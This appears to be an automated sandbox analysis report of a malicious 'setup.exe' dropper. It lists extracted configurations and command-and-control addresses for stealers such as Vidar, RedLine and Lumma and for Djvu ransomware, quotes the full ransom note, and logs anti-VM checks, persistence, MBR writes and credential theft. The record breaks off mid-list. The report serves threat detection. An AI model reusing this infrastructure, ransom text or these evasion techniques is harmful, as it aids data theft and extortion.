Analysis
-
max time kernel
96s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
10-05-2024 13:29
Behavioral task
behavioral1
Sample
concrt140.dll
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
concrt140.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
msvcp140.dll
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
msvcp140.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
res_mods/1.23.0.0/scripts/client/gui/mods/mod_a.pyc
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
res_mods/1.23.0.0/scripts/client/gui/mods/mod_a.pyc
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
setup.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
setup.exe
Resource
win10v2004-20240426-en
General
-
Target
setup.exe
-
Size
728.0MB
-
MD5
d42c009f5de776968186dc6611afc922
-
SHA1
dd33414810424002b6c352ba52e32cc6de107340
-
SHA256
95d4dc9ddb0a283dc001ef3e24112336c19e4411a5749e9612b3b87bd4a3c278
-
SHA512
dfd643f0f62d979fc39b582670e62e51407b45461258cda0d170d4448646064efb7bc8452c92055f2284e704e07412709537958695a5a8c9e0cc12c7ecf7850d
-
SSDEEP
98304:3Spz0Du6W9TrgWd/JdKX1Hxsyp7loTGEE2W/gMnzJ:3Spr9TVdxQXkY5o7U
Malware Config
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000
Extracted
risepro
147.45.47.126:58709
Extracted
stealc
Extracted
vidar
9.6
681a223bec180ebfdc48547d3d5bd784
https://steamcommunity.com/profiles/76561199681720597
https://t.me/talmatin
-
profile_id_v2
681a223bec180ebfdc48547d3d5bd784
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Extracted
djvu
http://cajgtus.com/lancer/get.php
-
extension
.qeza
-
offline_id
jgILOjDrBgyzY4JmT3B2jDSyBmDPBruKk8bKs6t1
- payload_url
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/665ddae3fc3cd10bbaaa4350408b196920240504141005/4cae7e Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0869PsawqS
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.77:6541
Extracted
lumma
https://stiffraspyofkwsl.shop/api
https://acceptabledcooeprs.shop/api
https://obsceneclassyjuwks.shop/api
https://zippyfinickysofwps.shop/api
https://miniaturefinerninewjs.shop/api
https://plaintediousidowsko.shop/api
https://sweetsquarediaslw.shop/api
https://holicisticscrarws.shop/api
https://boredimperissvieos.shop/api
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral8/memory/2924-386-0x0000000000400000-0x0000000000647000-memory.dmp family_vidar_v7 behavioral8/memory/2924-383-0x0000000000400000-0x0000000000647000-memory.dmp family_vidar_v7 behavioral8/memory/2924-368-0x0000000000400000-0x0000000000647000-memory.dmp family_vidar_v7 -
Detect ZGRat V1 6 IoCs
resource yara_rule behavioral8/files/0x000a000000023369-248.dat family_zgrat_v1 behavioral8/memory/5088-264-0x0000000000150000-0x00000000005CA000-memory.dmp family_zgrat_v1 behavioral8/memory/6116-520-0x0000000000400000-0x000000000046E000-memory.dmp family_zgrat_v1 behavioral8/memory/6512-998-0x000001C440790000-0x000001C443FC4000-memory.dmp family_zgrat_v1 behavioral8/memory/6512-1001-0x000001C45F0E0000-0x000001C45F1EA000-memory.dmp family_zgrat_v1 behavioral8/memory/6512-1005-0x000001C45E660000-0x000001C45E684000-memory.dmp family_zgrat_v1 -
Detected Djvu ransomware 3 IoCs
resource yara_rule behavioral8/memory/4400-384-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral8/memory/4400-364-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral8/memory/4400-542-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral8/memory/1328-353-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 241 6564 svchost.exe 258 6840 powershell.exe 275 3220 powershell.exe 276 3220 powershell.exe 282 6652 powershell.exe -
pid Process 1136 powershell.exe 4680 powershell.exe 3700 powershell.exe 6840 powershell.exe 3220 powershell.exe 6652 powershell.exe 5584 powershell.exe 6456 powershell.exe 3984 powershell.exe 5596 powershell.exe 5800 powershell.EXE 3152 powershell.exe 4404 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5688 netsh.exe -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral8/files/0x000a000000023369-141.dat net_reactor behavioral8/files/0x000a000000023369-248.dat net_reactor behavioral8/memory/5088-264-0x0000000000150000-0x00000000005CA000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation SgyWxN7jSEUOkw_HmuPeEZI0.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk m_9CDEY7PmIISiamjrGWjojo.exe -
Executes dropped EXE 29 IoCs
pid Process 2648 51HqerGWInGgiQEgyHhi5Ewi.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 1016 m_9CDEY7PmIISiamjrGWjojo.exe 3684 7forErqq4tbW3RURgjjmm5tm.exe 4524 7fNSg2WKyZlCWuN1JzjiXiZP.exe 3648 6IC7dyUGxyYC6aDNKgDSHQmp.exe 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 4836 hfoYQesW8IJZ10pnd5hzvSEz.exe 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe 2960 SgyWxN7jSEUOkw_HmuPeEZI0.exe 4800 ILm1VJidP2rxCFpVshnScgnv.exe 2084 Mp8x5bobgjtqhrH0eLG6TG4R.exe 2476 t3vA2ofLelWYvnTOYXinyNdK.exe 5088 yyr14Q2qYaLOAnqjm2zPa6oC.exe 1280 qSN72VNu1dsgP8LHOGW1Rl9s.exe 3940 Aiu1y1TzmkCw7FwsSWl6ROeB.exe 1588 Mp8x5bobgjtqhrH0eLG6TG4R.tmp 4124 Install.exe 4400 SgyWxN7jSEUOkw_HmuPeEZI0.exe 1172 Install.exe 832 fastmixerfreeedition.exe 4660 fastmixerfreeedition.exe 468 bkqtzupkspiy.exe 6176 SgyWxN7jSEUOkw_HmuPeEZI0.exe 6876 Install.exe 2392 SgyWxN7jSEUOkw_HmuPeEZI0.exe 5100 bkqtzupkspiy.exe 4008 i1.exe -
Loads dropped DLL 5 IoCs
pid Process 3648 6IC7dyUGxyYC6aDNKgDSHQmp.exe 1588 Mp8x5bobgjtqhrH0eLG6TG4R.tmp 5088 yyr14Q2qYaLOAnqjm2zPa6oC.exe 3684 7forErqq4tbW3RURgjjmm5tm.exe 3684 7forErqq4tbW3RURgjjmm5tm.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 800 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral8/memory/3804-0-0x0000000140000000-0x000000014099F000-memory.dmp themida behavioral8/memory/3804-12-0x0000000140000000-0x000000014099F000-memory.dmp themida behavioral8/memory/3804-136-0x0000000140000000-0x000000014099F000-memory.dmp themida behavioral8/memory/3804-189-0x0000000140000000-0x000000014099F000-memory.dmp themida behavioral8/memory/3804-403-0x0000000140000000-0x000000014099F000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" m_9CDEY7PmIISiamjrGWjojo.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7dd73705-8f6d-4ee2-a162-e1ac0f84b7b7\\SgyWxN7jSEUOkw_HmuPeEZI0.exe\" --AutoStart" SgyWxN7jSEUOkw_HmuPeEZI0.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 176 iplogger.org 177 iplogger.org -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 185 api.2ip.ua 269 api.2ip.ua 28 api.myip.com 29 api.myip.com 30 ipinfo.io 31 ipinfo.io 184 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 7fNSg2WKyZlCWuN1JzjiXiZP.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 3804 setup.exe 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe 3384 dYxScN9MMZvzIWB3AkbI0aU0.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 3996 set thread context of 1328 3996 LNB5cUXIMLWv2pLu3adb9Whf.exe 122 PID 2960 set thread context of 4400 2960 SgyWxN7jSEUOkw_HmuPeEZI0.exe 123 PID 4836 set thread context of 2924 4836 hfoYQesW8IJZ10pnd5hzvSEz.exe 124 PID 5088 set thread context of 6116 5088 yyr14Q2qYaLOAnqjm2zPa6oC.exe 160 PID 2648 set thread context of 6228 2648 51HqerGWInGgiQEgyHhi5Ewi.exe 197 PID 468 set thread context of 1088 468 bkqtzupkspiy.exe 203 PID 468 set thread context of 6564 468 bkqtzupkspiy.exe 328 PID 6176 set thread context of 2392 6176 SgyWxN7jSEUOkw_HmuPeEZI0.exe 226 PID 5100 set thread context of 2356 5100 bkqtzupkspiy.exe 239 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\butYHpXTvMdZIJsEKZ.job schtasks.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6644 sc.exe 6908 sc.exe 7096 sc.exe 7088 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 6200 5088 WerFault.exe 113 6848 2924 WerFault.exe 124 6400 3684 WerFault.exe 102 6148 3940 WerFault.exe 114 7012 4008 WerFault.exe 249 4684 5876 WerFault.exe 332 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7forErqq4tbW3RURgjjmm5tm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7forErqq4tbW3RURgjjmm5tm.exe -
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6952 schtasks.exe 2792 schtasks.exe 5948 schtasks.exe 3372 schtasks.exe 5548 schtasks.exe 4580 schtasks.exe 4556 schtasks.exe 4424 schtasks.exe 6200 schtasks.exe 1236 schtasks.exe 4452 schtasks.exe 1176 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936db0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936db0000006024b221ea3a6910a2dc08002b30309dcb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ SgyWxN7jSEUOkw_HmuPeEZI0.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1016 m_9CDEY7PmIISiamjrGWjojo.exe 1016 m_9CDEY7PmIISiamjrGWjojo.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 1280 qSN72VNu1dsgP8LHOGW1Rl9s.exe 1280 qSN72VNu1dsgP8LHOGW1Rl9s.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 4400 SgyWxN7jSEUOkw_HmuPeEZI0.exe 4400 SgyWxN7jSEUOkw_HmuPeEZI0.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 436 OHHcmC743LqiNfsmae4js_QK.exe 4880 chrome.exe 4880 chrome.exe 5136 msedge.exe 620 msedge.exe 5136 msedge.exe 620 msedge.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 2568 QaJTEr3dmw7ln0GcExGbbGBX.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe 1328 RegAsm.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe 620 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 436 OHHcmC743LqiNfsmae4js_QK.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeDebugPrivilege 6116 MsBuild.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeBackupPrivilege 6116 MsBuild.exe Token: SeSecurityPrivilege 6116 MsBuild.exe Token: SeSecurityPrivilege 6116 MsBuild.exe Token: SeSecurityPrivilege 6116 MsBuild.exe Token: SeSecurityPrivilege 6116 MsBuild.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeDebugPrivilege 1328 RegAsm.exe Token: SeShutdownPrivilege 6612 powercfg.exe Token: SeCreatePagefilePrivilege 6612 powercfg.exe Token: SeShutdownPrivilege 6620 powercfg.exe Token: SeCreatePagefilePrivilege 6620 powercfg.exe Token: SeShutdownPrivilege 6636 powercfg.exe Token: SeCreatePagefilePrivilege 6636 powercfg.exe Token: SeShutdownPrivilege 6628 powercfg.exe Token: SeCreatePagefilePrivilege 6628 powercfg.exe Token: SeDebugPrivilege 6840 powershell.exe Token: SeDebugPrivilege 6456 powershell.exe Token: SeLockMemoryPrivilege 6564 svchost.exe Token: SeShutdownPrivilege 4516 powercfg.exe Token: SeCreatePagefilePrivilege 4516 powercfg.exe Token: SeShutdownPrivilege 1908 powercfg.exe Token: SeCreatePagefilePrivilege 1908 powercfg.exe Token: SeShutdownPrivilege 6508 powercfg.exe Token: SeCreatePagefilePrivilege 6508 powercfg.exe Token: SeShutdownPrivilege 6512 powercfg.exe Token: SeCreatePagefilePrivilege 6512 powercfg.exe Token: SeIncreaseQuotaPrivilege 6156 WMIC.exe Token: SeSecurityPrivilege 6156 WMIC.exe Token: SeTakeOwnershipPrivilege 6156 WMIC.exe Token: SeLoadDriverPrivilege 6156 WMIC.exe Token: SeSystemProfilePrivilege 6156 WMIC.exe Token: SeSystemtimePrivilege 6156 WMIC.exe Token: SeProfSingleProcessPrivilege 6156 WMIC.exe Token: 